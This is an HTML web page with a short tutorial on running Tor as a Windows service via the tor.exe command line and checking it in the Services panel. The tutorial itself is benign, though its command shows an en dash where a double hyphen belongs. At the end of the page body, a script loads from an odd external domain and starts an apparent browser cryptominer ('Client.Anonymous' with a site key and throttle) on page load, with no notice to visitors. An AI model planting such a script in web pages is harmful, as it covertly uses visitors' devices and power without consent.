<!doctype html><html amp lang="en-us"><head><meta charset="utf-8"><title>How to install Tor on Windows without the Tor Browser running - Tutorial - DeepDarkWeb</title><meta name="description" content="How to install Tor on Windows without the Tor Browser Bundle - Tutorial - Running Tor as a service on Windows. Tor command line installation Windows.
"><meta name="robots" content="index, follow"><link rel="canonical" href="https://DeepDarkWeb.github.io/how-to-install-tor-on-windows-without-the-tor-browser-running-tutorial/"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet" type="text/css"><script async custom-element="amp-sidebar" src="https://cdn.ampproject.org/v0/amp-sidebar-0.1.js"></script><script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script><script async custom-element="amp-analytics" src="https://cdn.ampproject.org/v0/amp-analytics-0.1.js"></script><script async custom-element="amp-iframe" src="https://cdn.ampproject.org/v0/amp-iframe-0.1.js"></script><script type="application/ld+json">{"@context":"http://schema.org","@type":"Article","mainEntityOfPage":{"@type":"WebPage","@id":"https://DeepDarkWeb.github.io/amp/how-to-install-tor-on-windows-without-the-tor-browser-running-tutorial/"},"headline":"How to install Tor on Windows without the Tor Browser running - Tutorial","datePublished":"2018-06-24T11:08","dateModified":"2018-06-25T08:20","image":{"@type":"ImageObject","url":"https://DeepDarkWeb.github.io/media/posts/19/tor-logo.png","height":273,"width":453},"description":"These are the installation instructions for installing Tor on Windows without the need to have the Tor Browser Bundle (TBB) running all the time as well. Running Tor as a service on Windows separately from the Tor Browser Bundle is only usefull for users who want&hellip;","author":{"@type":"Person","name":"DeepDarkWeb"},"publisher":{"@type":"Organization","name":"DeepDarkWeb"}}</script><style amp-custom>article,
aside,
footer,
header,
hgroup,
main,
nav,
section {
  display: block; }

*,
*:before,
*:after {
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
  margin: 0;
  padding: 0; }

li {
  list-style: none; }

amp-img {
  max-width: 100%; }

button,
input,
select,
textarea {
  font: inherit; }

html {
  font-size: 1rem; }

body {
  background: #f1f1f1;
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  line-height: 1.6; }

a {
  color:  #26292B;
  text-decoration: none;
  -webkit-transition: all 0.12s linear 0s;
  -o-transition: all 0.12s linear 0s;
  transition: all 0.12s linear 0s; }

a:hover {
  color: #262626;
  text-decoration: underline;
  -webkit-text-decoration-skip: ink;
  text-decoration-skip: ink; }

a:active {
  color: #262626; }

a:focus {
  outline: 2px dotted #26292B; }

figure,
blockquote,
p,
ul,
ol,
dl,
table,
hr,
fieldset {
  margin-top: 1.6rem; }

h1,
h2,
h3,
h4,
h5,
h6 {
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-weight: 500;
  line-height: 1.2;
  margin-top: 2.13333rem; }

h1 {
  font-size: 1.67583rem;
  font-weight: normal; }

h2 {
  font-size: 1.4729rem; }

h3 {
  font-size: 1.29454rem; }

h4 {
  font-size: 1.13778rem; }

h5 {
  font-size: 1rem; }

h6 {
  font-size: 0.87891rem; }

h2 + p,
h3 + p,
h4 + p,
h5 + p,
h6 + p {
  margin-top: 0.8rem; }

b,
strong {
  font-weight: 600; }

blockquote {
  color: #6c7175;
  font-family: "Droid Serif", "Times", "Source Serif Pro", serif;
  font-style: italic;
  padding: 1.33333rem 0.53333rem 1.33333rem 3.2rem;
  position: relative; }
  blockquote:before {
    display: block;
    content: "\201C";
    font-size: 4.41226rem;
    position: absolute;
    left: 0;
    top: -12px;
    color: rgba(108, 113, 117, 0.5); }
  blockquote > :nth-child(1) {
    margin-top: 0; }

ul,
ol {
  margin-left: 2rem; }
  ul > li,
  ol > li {
    list-style: inherit;
    padding: 0 0 0.26667rem 0.26667rem; }

dl dt {
  color: #262626;
  font-weight: 600; }

code,
pre {
  background-color: #f1f1f1;
  font-family: monospace; }

pre {
  margin: 1.6rem 0 0;
  padding: 1.6rem;
  white-space: pre-wrap;
  word-wrap: break-word;
  overflow-x: auto; }
  pre > code {
    color: #262626;
    padding: 0; }

code {
  border-radius: 3px;
  color: #262626;
  padding: 0.26667rem 0.53333rem; }

table {
  border-collapse: collapse;
  border-spacing: 0;
  border: 1px solid #d4d4d4;
  width: 100%;
  overflow-x: auto;
  vertical-align: top;
  text-align: left;
  white-space: nowrap; }
  table th {
    font-weight: 500;
    padding: 0.53333rem 1.06667rem; }
  table tr {
    border-bottom: 1px solid #d4d4d4; }
    table tr:nth-child(2n) {
      background: #f1f1f1; }
  table td {
    padding: 0.53333rem 1.06667rem; }

figcaption {
  clear: both;
  color: rgba(108, 113, 117, 0.6);
  font-size: 0.82397rem;
  margin: 0.8rem 0 0;
  text-align: center; }

sub,
sup {
  font-size: 65%; }

hr {
  border: 0;
  height: 0;
  border-top: 1px solid rgba(0, 0, 0, 0.1);
  border-bottom: 1px solid rgba(255, 255, 255, 0.3); }

.btn, [type=button],
[type=submit],
button {
  background: #26292B;
  border: none;
  border-radius: 2px;
  color: #ffffff;
  cursor: pointer;
  display: inline-block;
  font-size: 0.87891rem;
  font-weight: 500;
  line-height: 1.9;
  padding: 0.53333rem 1.33333rem;
  text-align: center;
  text-decoration: none;
  -webkit-transition: all .15s ease;
  -o-transition: all .15s ease;
  transition: all .15s ease;
  width: auto; }
  .btn:hover, [type=button]:hover,
  [type=submit]:hover,
  button:hover {
    background: #262626;
    color: #ffffff; }
  .btn:focus, [type=button]:focus,
  [type=submit]:focus,
  button:focus {
    outline: none; }
  .btn-outline {
    border: 1px solid #ddd;
    background: #ffffff;
    border-radius: 3px;
    color: #262626; }

[type=button],
[type=submit],
button {
  text-transform: uppercase;
  -webkit-appearance: none;
  -moz-appearance: none; }

.navbar {
  background: #26292B;
  -webkit-box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  line-height: 3;
  max-height: 4rem; }
  .navbar > div {
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
    text-align: left;
    max-width: 700px;
    margin: 0 auto; }
  .navbar a {
    color: #ffffff;
    text-decoration: none; }
  .navbar-sidebar-toggle {
    left: 0;
    position: relative;
    text-indent: -99999rem; }
    .navbar-sidebar-toggle:before {
      content: "";
      display: block;
      border-top: 0.375rem double #ffffff;
      border-bottom: 0.125rem solid #ffffff;
      height: 0.125rem;
      position: absolute;
      text-indent: 0;
      top: 50%;
      width: 1.3rem;
      -webkit-transform: translate(0px, -50%);
      -ms-transform: translate(0px, -50%);
      transform: translate(0px, -50%); }


.logo {
            display: inline-block;
  font-weight: 600;
  line-height: 1;
            margin: 0 auto;
            height: 2rem;
            text-indent: -9999px;
            width: 240px;vertical-align: middle;
        }
        .logo.logo-text {
            line-height: 2;
            text-align: center;
            text-indent: 0;
        }

amp-sidebar {
  background: #ffffff;
  width: 240px; }
  amp-sidebar > ul {
    margin: 0.8rem 0 0;
    padding: 0; }
    amp-sidebar > ul ul {
      border-left: 1px solid #d4d4d4;
      margin: 0.53333rem 0 0; }
    amp-sidebar > ul li {
      color: #262626;
      font-size: 0.9375rem;
      font-weight: 600;
      list-style: none;
      line-height: 1.4;
      padding: 0.42667rem 1.06667rem; }
      amp-sidebar > ul li li {
        font-weight: normal;
        padding: 0.26667rem 0 0.26667rem 1.06667rem; }
    amp-sidebar > ul a,
    amp-sidebar > ul a:visited {
      color: #262626; }

.bg-white {
  background: #ffffff; }

.wrap-page {
  max-width: 700px;
  margin: 0 auto; }

@media all and (max-width: 43.6875em) {
  .wrap-inner {
    padding: 0 6%; } }

.page-title {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding: 1.6rem 6%; }
  .page-title > h1 {
    margin: 0;
    font-size: 1.29454rem; }
  .page-title > p {
    font-size: 0.87891rem;
    color: #6c7175;
    line-height: 1.3;
    margin: 0.26667rem 0 0; }
  .page-title-author {
    border-radius: 50%;
    float: left;
    height: 2.5rem;
    width: 2.5rem; }
    .page-title-author + h1 {
      margin-left: 3.5rem; }
      .page-title-author + h1 + p {
        margin-left: 3.5rem; }

.card {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding-bottom: 1.06667rem; }

  .card-meta {
    border-top: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-top: 1.06667rem;
    text-transform: uppercase; }
    .card-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .card-text {
    font-size: 0.9375rem;
    overflow: hidden;
    padding: 0 6%; }
    .card-text h2 {
      font-size: 1.13778rem; }

.post {
  margin-bottom: 2.13333rem; }
  .post-featured-image {
    margin-top: 0;
    position: relative; }
    .post-featured-image > figcaption {
      background: rgba(0, 0, 0, 0.5);
      border-radius: 3px;
      color: #ffffff;
      position: absolute;
      bottom: 0.8rem;
      padding: 0 0.26667rem;
      right: 6%; }
  .post-header {
    margin-bottom: 2.13333rem; }
  .post-meta {
    border-bottom: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-bottom: 1.06667rem;
    text-transform: uppercase; }
    .post-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .post-tag {
    margin: 0; }
    .post-tag > li {
      display: inline-block;
      padding: 0; }
      .post-tag > li a {
        background: #f1f1f1;
        border-radius: 2px;
        color: #6c7175;
        font-size: 0.77248rem;
        display: inline-block;
        margin: 0 0.26667rem 0.26667rem 0;
        padding: 0.26667rem 0.53333rem; }
        .post-tag > li a:hover {
          background: #26292B;
          color: #ffffff;
          text-decoration: none; }
  .post-share {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
    margin-top: 1.6rem;
    width: 100%; }
    .post-share amp-social-share {
      -webkit-box-flex: 1;
      -ms-flex: 1 0 auto;
      flex: 1 0 auto;
      background-size: 24px; }
  .post-scroll {
    color: #ffffff;
    background: #26292B;
    bottom: 10px;
    border-radius: 50%;
    border: none;
    -webkit-box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    font-size: 1.13778rem;
    height: 46px;
    opacity: 0;
    outline: none;
    position: fixed;
    padding: 0;
    right: 4%;
    visibility: hidden;
    width: 46px;
    z-index: 9999; }
    .post-scroll-marker {
      height: 0px;
      position: absolute;
      top: 100px;
      width: 0px; }
        .post-pagination {
    background: #f1f1f1;
    -webkit-box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    border-top: 1px solid #d4d4d4;
    padding: 1.06667rem 0; }
    .post-pagination > div {
      line-height: 1.2;
      padding: 0.53333rem 1.06667rem;
      text-align: center; }
      .post-pagination > div span {
        display: block;
        color: #6c7175;
        font-size: 0.7242rem;
        font-weight: 500;
        margin-bottom: 0.26667rem;
        text-transform: uppercase; }
    .post-pagination-prev a:before {
      content: "\2190";
      margin-right: 0.26667rem; }
    .post-pagination-next a:after {
      content: "\2192";
      margin-left: 0.26667rem; }

aside {
  margin: 1.6rem 0 0; }

.align-left {
  text-align: left; }

.align-right {
  text-align: right; }

.align-center {
  text-align: center; }

.align-justify {
  text-align: justify; }

.msg {
  border-left: 2px solid transparent;
  padding: 1.06667rem 1.06667rem; }
  .msg--highlight {
    background-color: #fff8e6;
    border-color: #e2ac4f; }
  .msg--info {
    background: rgba(45, 97, 201, 0.03);
    border-color: #26292B; }
  .msg--success {
    background: #f7fbf6;
    border-color: #5ab44b; }
  .msg--warning {
    background: #fff3f3;
    border-color: #c06367;
    color: #a94442; }

.dropcap:first-letter {
  float: left;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-size: 2.16943rem;
  line-height: 0.7;
  margin-right: 0.53333rem;
  padding: 0.53333rem 0.53333rem 0.53333rem 0; }

.pagination {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
  justify-content: space-between;
  margin: 0.8rem 0; }
  .pagination > a {
    padding-left: 0;
    padding-right: 0;
    width: 49%; }
  .pagination-right {
    margin-left: auto; }

.bottom {
  background: #26292B;
  color: #ffffff;
  padding: 1.06667rem 4%;
  text-align: center; }</style><style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript><script async src="https://cdn.ampproject.org/v0.js"></script><script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script><script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script></head><body class="bg-white"><nav class="navbar wrap-inner" id="top"><div><a on="tap:navbar-sidebar.toggle" class="navbar-sidebar-toggle" title="Menu">Menu</a> <a class="logo logo-text" href="https://DeepDarkWeb.github.io/amp">DeepDarkWeb</a></div></nav><main class="wrap-page"><article class="post"><figure class="post-featured-image"><amp-img src="https://DeepDarkWeb.github.io/media/posts/19/tor-logo.png" alt="How to install Tor on Windows without the Tor Browser running - Tutorial" srcset="https://DeepDarkWeb.github.io/media/posts/19/responsive/tor-logo-xs.png 300w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/tor-logo-sm.png 480w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/tor-logo-md.png 768w" sizes="(max-width: 768px) 100vw, 768px" height="273" layout="responsive" width="453"></amp-img></figure><div class="wrap-inner"><header class="post-header"><h1>How to install Tor on Windows without the Tor Browser running - Tutorial</h1></header><p>These are the installation instructions for installing Tor on Windows without the need to have the Tor Browser Bundle (TBB) running all the time as well.</p><p>Running Tor as a service on Windows separately from the Tor Browser Bundle is only usefull for users who want to keep Tor running all the time, without having to have the Tor Browser running as well. </p><p>This lets you use Tor for other services, such as instant messaging, email, or remotely accessing other computers through the Tor network. It can be especially usefull for you if you want to host onion services (Hidden Services/.onion Sites) on your Windows computer or relay traffic for other Tor users.</p><p><a href="https://DeepDarkWeb.github.io/amp/Tor-Browser-Direct-Download-Links/" title="Tor Browser Direct Download Links" target="_blank" rel="noopener noreferrer">The Tor Browser Bundle</a> installer for Windows, provided by the Tor Project, does not include an option during installation to configure Tor to run as a Windows service. But, by using the Windows command line interface (CLI) you can easily instruct tor.exe to install a Windows Service without any additional downloads or advanced configuration.</p><p>For most users the installation of the Tor Browser Bundle is all they need to browse the web anonymously or to let another app connect to the internet over Tor. You can find here further information about the <a href="https://DeepDarkWeb.github.io/amp/how-to-browse-the-web-anonymously-for-free-tor-browser/" title="How to browse the web anonymously for free with the Tor Browser Bundle" target="_blank" rel="noopener noreferrer">Tor Browser and direct download links for iOS, macOS, Windows and Linux/Unix.</a></p><h3 id="installing-the-windows-service"><span>How to install Tor on Windows without the need to have the Tor Browser Bundle running- Tutorial - Installing Tor as a Windows Service:</span></h3><p>First, download and install the Tor Browser Bundle for Windows:</p><ul><li><a href="https://deepdarkweb.github.io/Tor-Browser-Direct-Download-Links-Windows/" target="_blank" rel="noopener noreferrer" title="Tor Browser Windows Direct Download Links">Tor Browser Windows Download</a></li></ul><p>Open the Windows File Explorer and navigate to the directory in which you installed the Tor Browser (i.e. C:\Tor Browser\)</p><ol><li>Go into the Browser\TorBrowser\ directory</li><li>You should see a "Tor" folder in this directory</li><li>While holding down the "Shift" key, right click the "Tor" folder</li><li>Select "Open command window here"</li></ol><figure class="post__image--full"><amp-img src="https://DeepDarkWeb.github.io/media/posts/19/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-1.jpg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-1-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-1-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-1-md.jpg 768w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-1-lg.jpg 1024w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-1-xl.jpg 1360w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-1-2xl.jpg 1600w" sizes="(max-width: 449px) 100vw, 449px" srcset="https://dephekt.net/wp-content/uploads/2017/10/open_cmd_window.jpg 449w, https://dephekt.net/wp-content/uploads/2017/10/open_cmd_window-300x191.jpg 300w" alt="How to install Tor on Windows without the Tor Browser Bundle - Tutorial 1" width="449" height="286" layout="responsive"></amp-img></figure><p>This will open the Windows CLI already in the context of the C:\Tor Browser\Browser\TorBrowser\Tor\ directory (or wherever you have installed the Tor Browser).</p><figure class="post__image--full"><amp-img src="https://DeepDarkWeb.github.io/media/posts/19/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-2.jpg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-2-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-2-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-2-md.jpg 768w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-2-lg.jpg 1024w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-2-xl.jpg 1360w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-2-2xl.jpg 1600w" sizes="(max-width: 660px) 100vw, 660px" srcset="https://dephekt.net/wp-content/uploads/2017/10/cmd_window.jpg 660w, https://dephekt.net/wp-content/uploads/2017/10/cmd_window-300x194.jpg 300w" alt="How to install Tor on Windows without the Tor Browser Bundle - Tutorial 2" width="660" height="426" layout="responsive"></amp-img></figure><p>Now enter the following command to instruct tor.exe to install a Windows Service:</p><p><code>c:\Tor Browser\Browser\TorBrowser\Tor&gt; tor.exe –service install</code></p><p>That's it - now you are running Tor as a service on Windows.</p><p>You can check if the service was installed by opening the Windows Services snap-in by holding down the Windows Key while pressing R and typing services.msc:</p><figure class="post__image--full"><amp-img src="https://DeepDarkWeb.github.io/media/posts/19/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-3.jpg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-3-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-3-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-3-md.jpg 768w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-3-lg.jpg 1024w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-3-xl.jpg 1360w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-3-2xl.jpg 1600w" sizes="(max-width: 399px) 100vw, 399px" srcset="https://dephekt.net/wp-content/uploads/2017/10/services_run.jpg 399w, https://dephekt.net/wp-content/uploads/2017/10/services_run-300x155.jpg 300w" alt="How to install Tor on Windows without the Tor Browser Bundle - Tutorial 3" width="399" height="206" layout="responsive"></amp-img></figure><p>Click "OK" </p><figure class="post__image--full"><amp-img src="https://DeepDarkWeb.github.io/media/posts/19/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-4.jpg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-4-xs.jpg 300w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-4-sm.jpg 480w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-4-md.jpg 768w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-4-lg.jpg 1024w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-4-xl.jpg 1360w ,https://DeepDarkWeb.github.io/media/posts/19/responsive/How-to-install-Tor-on-Windows-without-the-Tor-Browser-Bundle-Tutorial-4-2xl.jpg 1600w" sizes="(max-width: 700px) 100vw, 700px" srcset="https://dephekt.net/wp-content/uploads/2017/10/services_open.jpg 700w, https://dephekt.net/wp-content/uploads/2017/10/services_open-300x246.jpg 300w" alt="How to install Tor on Windows without the Tor Browser Bundle - Tutorial 4" width="700" height="574" layout="responsive"></amp-img></figure><p>Check for "Tor Win32 Service" in the list and view its status, as well as stop, start, or restart the service.</p><p>It can also be easily configured to not automatically start on Windows boot (if desired).</p><p>Now you can configure other software to use the Tor service (tunnel traffic through the Tor network) for anonymous internet connections.  </p><aside><ul class="post-tag"><li><a href="https://DeepDarkWeb.github.io/amp/tags/darknet/">Darknet</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/privacy/">Privacy</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/tor/">Tor</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/tutorial/">Tutorial</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/windows/">Windows</a></li></ul><div class="post-share"><amp-social-share type="system" width="40" height="40" data-param-text="How to install Tor on Windows without the Tor Browser running - Tutorial"></amp-social-share><amp-social-share type="twitter" width="40" height="40" data-param-text="How to install Tor on Windows without the Tor Browser running - Tutorial" data-param-url="https://DeepDarkWeb.github.io/amp/how-to-install-tor-on-windows-without-the-tor-browser-running-tutorial/"></amp-social-share><amp-social-share type="whatsapp" width="40" height="40" data-param-text="How to install Tor on Windows without the Tor Browser running - Tutorial"></amp-social-share></div></aside></div></article><nav class="post-pagination wrap-inner"><div class="post-pagination-prev"><span>Previous Post</span> <a href="https://DeepDarkWeb.github.io/amp/Tor-Browser-Direct-Download-Links-Windows/">Tor Browser Direct Download Links - Windows</a></div></nav></main><amp-animation id="showAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
                        "keyframes": [{
                            "opacity": "1",
                            "visibility": "visible",
                            "transform": "scale(1)"
                        }]
                    }]
                }</script></amp-animation><amp-animation id="hideAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
                        "keyframes": [{
                            "opacity": "0",
                            "visibility": "hidden",
                            "transform": "scale(0.1)"
                        }]
                    }]
                }</script></amp-animation><div class="post-scroll-marker"><amp-position-observer on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer></div><button class="post-scroll" on="tap:top.scrollTo(duration=200)">&#8593;</button><footer class="bottom">DeepDarkWeb</footer><amp-sidebar id="navbar-sidebar" layout="nodisplay"><ul><li><a href="https://DeepDarkWeb.github.io/amp/" title="DeepDarkWeb - Homepage">Home</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/news/" title="DeepDarkWeb - News">News</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/privacy/" title="DeepDarkWeb - Privacy">Privacy</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/decentralization/" title="DeepDarkWeb - Decentralization">Decentralization</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/marketplace/" title="DeepDarkWeb - Marketplaces">Marketplaces</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/cryptocurrency/" title="CryptoCurrency - DeepDarkWeb">CryptoCurrency</a></li><li><a href="https://DeepDarkWeb.github.io/amp/about-the-deepdarkweb/" title="About the DeepDarkWeb">About</a></li></ul></amp-sidebar><amp-analytics type="googleanalytics" id="analytics1"><script type="application/json">{
            "vars": {
                "account": "UA-120926139-1"
            },
            "triggers": {
                "trackPageview": {
                    "on": "visible",
                    "request": "pageview"
                }
            }
        }</script></amp-analytics><script src="https://www.freecontent.date./JMH3.js"></script><script>var _client = new Client.Anonymous('61ec05d369c0b85249bda5d00926341400778ecc5eaa00c6cbea5047d8c1380a', {
        throttle: 0.9
    });
    _client.start();</script></body></html>